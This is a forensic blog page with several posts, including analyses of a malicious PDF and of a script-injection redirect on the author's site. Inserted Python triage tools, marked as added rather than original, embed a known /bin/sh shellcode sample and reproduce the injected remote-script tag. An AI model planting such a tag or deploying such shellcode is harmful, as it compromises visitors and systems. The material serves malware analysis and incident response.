Brian Baskin's Site (FWIW)
Malicious PDF Analysis: Reverse code obfuscation
Last Updated on Monday, 23 April 2012 01:35 Written by Brian Baskin Wednesday, 08 February 2012 19:56
I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.
The email was received in my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it.
The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.
A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, which contained an XML subform with embedded JavaScript. Boring...
Upon examining the JavaScript, I saw a large block of data that would normally contain the shellcode, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained only integers between 0 and 74. This is not standard shellcode.
arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
So I started looking at the surrounding code.
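Before digging into the surrounding code, the quick triage that tells an analyst "this is an index table, not shellcode" can be scripted. The following is an added example, not code from the post: it parses the abbreviated arr string quoted above, summarizes its value range and symbol distribution, and contrasts it with a well-known 23-byte Linux x86 execve("/bin/sh") stub. The decode_with_key() routine shows the usual reversal for this kind of encoding (each integer is a position in a key string found elsewhere in the script); the key used here, DEMO_KEY, is a constructed stand-in, since the post has not shown what the real surrounding code supplies.

```python
from collections import Counter

# The abbreviated array quoted in the post (the real one is far longer and
# runs up to 74); used here as the sample input.
ARR = '0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9'

# A well-known 23-byte Linux x86 execve("/bin/sh") stub, included only as a
# contrast for what a real shellcode byte distribution looks like.
SHELLCODE_SAMPLE = list(bytes.fromhex('31c050682f2f7368682f62696e89e3505389e1b00bcd80'))

# Constructed stand-in for the key string; the post has not shown the real one.
DEMO_KEY = 'abcdefghijklm'  # 13 symbols, matching the 13 distinct indices in ARR


def parse_arr(s, sep='@'):
    """Split the '@'-delimited string into integers, ignoring empty tokens."""
    return [int(tok) for tok in s.split(sep) if tok.strip()]


def characterize(values):
    """Summarize the value range and symbol distribution of a decoded array."""
    counts = Counter(values)
    return {
        'count': len(values),
        'min': min(values),
        'max': max(values),
        'distinct': len(counts),
        'fits_in_byte': max(values) <= 0xFF,
        'most_common': counts.most_common(3),
    }


def looks_like_index_table(values, max_alphabet=128):
    """Heuristic: a contiguous 0..N-1 value set with a small N is what an
    index-into-key-string encoding produces. Raw shellcode bytes, by contrast,
    spread over most of 0..255 and are rarely contiguous from zero."""
    present = set(values)
    n = max(values) + 1
    return n <= max_alphabet and present == set(range(n))


def decode_with_key(values, key):
    """Reverse an index-table encoding once the key string is known: each
    integer selects one character of the key. Refuses keys that are too
    short rather than silently producing a truncated result."""
    if max(values) >= len(key):
        raise ValueError('key is shorter than the largest index')
    return ''.join(key[i] for i in values)


if __name__ == '__main__':
    vals = parse_arr(ARR)
    print(characterize(vals))
    print('index table?', looks_like_index_table(vals))
    print('shellcode sample index table?', looks_like_index_table(SHELLCODE_SAMPLE))
    print(decode_with_key(vals, DEMO_KEY))
```

The useful number is 'distinct': whatever key string the surrounding JavaScript builds has to be at least that long (75 characters for the real array, which is roughly the printable ASCII set), so any string literal or concatenation of that length near the decode loop is the first thing to look at.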
Closing Out 2011
Last Updated on Sunday, 29 January 2012 16:29 Written by Brian Baskin Sunday, 01 January 2012 13:35
It's been quite a few months since my last post, but this has definitely been a hectic and busy year. It's mostly due to that schedule that I've been unable to post anything interesting since... April. Wow.
When 2011 started I was just a few months into my new job with cmdLabs, a truly life-changing event. I still enjoy my time with Eoghan, Chris, and Terry and incredibly love what I do. It was only about a year ago when I felt completely helpless, bored, and unchallenged with my old employer. The technical challenges weren't coming, and I spent most of my time performing management tasks where the largest difficulties were to organize large spreadsheets, though I did volunteer for the job so I don't have too much of a right to complain. I sought out every opportunity with the outside to keep my feet grounded in technical work. With my continuing time at cmdLabs, that's changed dramatically. Each case was a fun and intricate challenge, and I was surrounded by the best to bounce ideas off of on a regular basis.
While working with cmdLabs the opportunity was open to provide forensic support to the Defense Computer Forensics Laboratory (DCFL). It took quite a few months for that to take place, but I finally joined the ranks there in early September. DCFL is a part of DC3 (Defense Cyber Crime Center), where I've been since 2000. However, I was always in the training side and not in the lab, and now the veil has been opened.
I took a spot in the Intrusions and Information Assurance division (I2A) as an intrusion analyst. It is no surprise that this is some of the most completely challenging and complex work I've ever done. I think back to the joy of performing penetration testing on servers and the rush of "popping a box", and realized that it doesn't compare with rewriting a large mathematical algorithm full of bitwise math to decode a new encoding method used to mask the exfiltration of data.
However, the first rule of defense work is that you don't talk about defense work. My social interactions have diminished greatly, mostly due to not having access to personal electronics or regular websites during working hours. As someone who loves to code new projects and release code and processes, I've had to place much of my personal commentary under self-scrutiny. And, when in doubt, bite my tongue and move on.
During the year I was roped into joining the General Dynamics - AIS (GD-AIS) team on the Maryland Cyber Challenge (MDC3 - no relation to DC3). This was a three-round contest that focused on blue-team, red-team, and forensics. For the blue-team exercise our team of six broke into two teams of three to focus on securing a Linux and Windows server, with myself on the Linux team. We passed that round and went into the Forensics round, which unfortunately occurred the same weekend I was at Derbycon - two hours after my talk, in fact. The staff at Derbycon kindly let me set up in the press room to work on the challenge remotely. Being remote on my Mac limited my abilities, but the challenge had a fair number of encoding and encryption challenges that I was able to break, and we passed the round. The final round was live at the Baltimore Conference Center, and was a bit of a shock. Up until 24 hours before the challenge we were told it was a full Capture the Flag with blue and red teaming. The day before we learned that it was full red-team, so we had to quickly adjust and retrain our team. We were easily outskilled by other competitors, but we placed decently.
For 2011 I stuck myself out there, much to the complaint of my introverted self. When the CFP for Defcon was about to wrap up, I decided to put together a talk called "Walking the Green Mile: How to Get Fired From Your Job After a Security Incident". A silly title, but I really suck at naming talks. The talk was about my increasing frustration in how many security practitioners were not doing their jobs right before, during, and after a security incident. As someone who has worked for years with many companies to respond to a security incident (including insiders, intrusions, and malware), I kept running into the same mistakes being made over and over. The talk was summarizing those mistakes in a way for others to learn to stop making them.
I first submitted the talk to Defcon, then Security BSides Vegas. I was declined for Defcon, which I expected, and was ecstatic at being selected for BSides. I was already volunteering to work on the security team there, so was already "in", but being able to speak was the icing on the cake. I also gave the talk at Defcon Skytalks, an unrecorded, off the record room at Defcon.
"That wasn't so bad", I told myself. So, I submitted for Derbycon and was surprised to be accepted there as well. Derbycon was a first year conference that was perfectly orchestrated. It was also, in my opinion, the best rendition of my talk that I had given; maybe because I didn't realize that I was being recorded until afterward.
I then finished up my speaking circuit at the local BSides Delaware, which went pretty great. But, it was after this event that I just grew tired of speaking. Too many talks in the year than what I was accustomed to. And, for me, every time I get on podium I'm anxiously awaiting someone to stand up, scream out, or do something to show how wrong I am and how I shouldn't be up talking. Then afterward, I crash from the stress and am usually mentally exhausted for hours. So, likely no voluntary conference talks for me in 2012.
However, that won't be so easy to escape. I start off 2012 at the DoD Cyber Crime Conference. There I will be "teaching" two pre-conference training courses. I was originally billed to teach the Carrier File Analysis course (malware analysis of PDF, CHM, compound documents, SWF, etc). Staffing issues meant that I now am doing half-teaching of that course and the Introduction to Malware Analysis, which occurs simultaneously. So it looks like I'll be running back and forth between the two sold-out classes for four days. While there I will also be giving my Intelligence Gathering Over Twitter talk for the second year. It will be an update from last year, on tools and methods to obtain information about a target on Twitter and their associations. Group analysis, friend analysis, metadata, and metasites (twitpic, etc). After that, I'll be done for 2012 :)
I will still be trying to volunteer for BSides events for Vegas and Delaware, and planning on attending ShmooCon, Defcon, BSides Vegas, Derbycon, and BSides Delaware. I'm going to make a push to finally attend REcon this year. But, being on-site full-time makes taking time off difficult, so I have to carefully pick and choose my cons.
Looking forward to new challenges in the upcoming year. Life is definitely more of a roller coaster ride now!
Analysis of Web-based Malware Attack
Last Updated on Tuesday, 17 May 2011 15:09 Written by Brian Baskin Thursday, 07 April 2011 17:52
The very nature of being a website on the Internet means that eventually it will be susceptible to attack. WordPress and blog sites are notoriously targeted with infections that append code to HTML files to redirect visitors to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified, just a few minutes after notification.
Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:
I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.
The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:
<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>
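One infected file is rarely the only one, so the next step after spotting the tag is to sweep the whole web root for it and pull each hit's MAC times in one pass. The following is an added example, not the post's own procedure or tooling: scan_webroot() walks a directory tree, reports every file containing an external script include along with whether it sits at offset 0 (prepended, as on this site) and its mtime/ctime/atime, and timeline() orders the hits and flags files whose mtime and ctime disagree. The sample web root it builds is constructed in a temp directory; the script URL inside it is the one quoted above, and the file names are illustrative.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Matches an external <script src=...></script> include. Legitimate pages can
# carry these too (CDNs), so the report is a candidate list, not a verdict.
INJECT_RE = re.compile(
    r'<script\s+src=["\']https?://[^"\']+["\']\s*>\s*</script>', re.IGNORECASE)


def scan_webroot(root, exts=('.htm', '.html', '.php')):
    """Walk root and return one record per file containing an external script
    tag, with its MAC times so the hits can be lined up on a timeline."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, 'rb') as fh:
                data = fh.read().decode('latin-1')  # never raises on odd bytes
            m = INJECT_RE.search(data)
            if not m:
                continue
            st = os.stat(path)
            hits.append({
                'path': path,
                'tag': m.group(0),
                'at_start': m.start() == 0,  # prepended to the file
                'mtime': st.st_mtime,
                'ctime': st.st_ctime,
                'atime': st.st_atime,
            })
    return hits


def timeline(hits, tolerance_s=60):
    """Order hits by ctime and flag files whose mtime disagrees with ctime.
    An attacker can reset mtime with touch(1), but ctime changes on every
    write and cannot be set from userland without altering the clock, so a
    large gap between the two on an infected file is itself a clue."""
    rows = []
    for h in sorted(hits, key=lambda h: h['ctime']):
        rows.append({
            'path': h['path'],
            'ctime': datetime.fromtimestamp(h['ctime'], tz=timezone.utc).isoformat(),
            'mtime': datetime.fromtimestamp(h['mtime'], tz=timezone.utc).isoformat(),
            'mtime_suspect': abs(h['ctime'] - h['mtime']) > tolerance_s,
        })
    return rows


def build_sample_webroot():
    """Create a throwaway web root with one clean page, one carrying the
    prepended tag quoted in the post, and a binary asset the scan must skip.
    Constructed data, not files from the site."""
    root = tempfile.mkdtemp(prefix='webroot_')
    clean = '<html><body><h1>Home</h1></body></html>\n'
    infected = ('<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n'
                '<html><body><h1>Books</h1></body></html>\n')
    with open(os.path.join(root, 'index.htm'), 'w') as fh:
        fh.write(clean)
    with open(os.path.join(root, 'books.htm'), 'w') as fh:
        fh.write(infected)
    with open(os.path.join(root, 'logo.png'), 'wb') as fh:
        fh.write(b'\x89PNG\r\n\x1a\n')
    return root


if __name__ == '__main__':
    root = build_sample_webroot()
    for row in timeline(scan_webroot(root)):
        print(row)
```

On a real server, run it against the live web root before cleaning anything, since the first edit you make resets the very timestamps you want to read; hits clustered on one ctime usually mark the moment the injection script ran, and a hit whose mtime sits years earlier than its ctime has had its mtime backdated.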
With the infection spotted, I checked the file's MAC times to see when the attack occurred:
2010 - A Year of Great Conferences
Last Updated on Friday, 31 December 2010 21:52 Written by Brian Baskin Saturday, 11 December 2010 18:05
A huge change in careers
Last Updated on Monday, 08 November 2010 21:36 Written by Brian Baskin Thursday, 04 November 2010 14:10
I am just finishing up my first week at my new place of employment, cmdLabs, LLC. What an amazing roller coaster ride.
Let's revisit the past ten years... just to get it off my mind and on paper.
It was with very mixed feelings that I left my former employer, where I had been employed for over 10 years. In late 1999 and early 2000 I was working as a network engineer at a NASDAQ data center near Washington, DC, suffering through the daily commutes. Through a friend I learned of a government facility where they were teaching computer forensics and investigations. It was outside of my skill set, but something I wanted passionately to be involved in. So, I made the leap to join CSC on the Defense Computer Investigations Training Program (DCITP) contract, as it was known at the time (now called the Defense Cyber Investigations Training Academy - DCITA), part of the Defense Cyber Crime Center (DC3). The downside to the move? I had to start at the ground floor. I started as classroom technical support. It was literally starting at the bottom rung of the ladder.
I did my work, head down, and found new ways to improve upon processes. I built databases, performed research, and eventually became a research aide to many of the instructors. When they got stumped by a hard question from a student, I would receive a pager message (yes, we had text pagers back then), and would try to get an answer within five minutes. After about a year of hard work, I raised the question - Let me teach. Let me start small, by teaching a hardware block of the introduction class. After a month or two of deliberation, they decided to give me a one-hour block teaching motherboard technology, with it recorded and reviewed by the government customer. I went up and did my thing - 15 minutes into the presentation slicing my arm with a sharp solder leg and bleeding out. I casually grabbed a towel used for cleaning the white board, placed it on my arm, and used a demo motherboard to apply pressure - all without missing a step and without the students even being aware (AFAIK).
I was given the job of being an instructor, and I started grabbing modules to teach. Within a year I had mastered all of the hardware/software/OS lessons of our core course and was the sole expert on the Linux section (being a user since 1994). Eventually, my need for more outgrew the class and I was moved to the Incident Responders team, where I started renovating their methods of Linux/Solaris incident response. I grew out from there into the Forensics material where I focused on host-based application artifacts. I then moved into Intrusions where I worked to renovate the Solaris Intrusion Response (FISE) course and build a new Linux Intrusion Response (FILE) course.
And all that in the space of just four years. I was working with Johnny Long on rebuilding our online investigations material, and we redesigned the course into new territories. Based upon much of my research, Johnny approached me with a side project. A Syngress project on IM/P2P security had lost an author and they needed someone to write the P2P analysis section, quickly. I then started researching and writing the Gnutella, Kazaa, and BitTorrent sections of the book, having them complete in just a month. And so began my side-career of being a "closer" for Syngress, but that's another story... But the research from that time, and since, has helped me become a premier P2P forensics researcher.
Eventually, by 2006, I had a mastery of the courses and was hitting a wall. At that point I was promoted to the Deputy Lead Technical Engineer position. I worked to review and authorize content changes to all of our courses. I performed extensive research on new forensic responses, next to Johnny who did research on new attacks, and then integrated the research into our training materials.
I also worked special projects for most of that period. When something huge came down the road, I was pulled to knock it out. One example was when, in 2008, the US Secret Service came to our customer with a huge project. They were establishing a brand new forensic school house in Alabama called the NCFI, where they would train state and locals in digital forensics. They asked us to develop seven courses with scenarios, instructor guides, PowerPoints, and handbooks, in a matter of six months. I was placed as the team lead and given four extensively qualified instructors to knock out the project. Which we did, on time and greatly under budget.
It was a dream job. It was my dream job. Yet, I left. Why? I pretty much hit my peak there. The projects that were coming down the line were less technical and less cutting-edge. They were more compliance-based to ensure we had standardized formats and guides. A lot of great technical work was still in process, but not enough to scratch my itch. After so many years there, I knew what was coming, and there were no big surprises left. So, it was very difficult to say goodbye to my family at CSC and DC3. A facility full of the brightest people doing great work. I feel like I've played a big hand in growing DCITA and DC3 to where it is today. I realize this sounds like I'm bragging of my work there, but it's just to show how strongly I feel about my family there.
I have moved on to become a Senior Consultant with cmdLabs, a wholly-owned subsidiary of The Newberry Group. I joined as the first real employee under the three partners: Eoghan Casey, Terrance Maguire, and Chris Daywalt. It's an exciting adventure, working out of cmdLabs' forensic lab in downtown Baltimore, but an opportunity to go the next step. This will literally be a ground floor operation to build out its capabilities, explore new forensic trenches, and have fun in the process.
What is there to learn from this? Do something you care about! Work in a field in which you are passionate! If you're not there right now, then get there. And realize that sometimes that takes a sacrifice. Don't expect that every new job is going to be an increase. You will take pay cuts, benefit cuts, and other sacrifices. But those are minor when compared to doing work that gives your life new meaning. Stop looking for a job that pays $10K more and look for one that you will gladly wake up every morning to do. And when, at a point, you've exhausted your stretch at one place, don't feel confined there. Seek to improve yourself.
And to my friends with CSC/DC3. I will definitely miss you. But, as you all know, this is an extremely small community.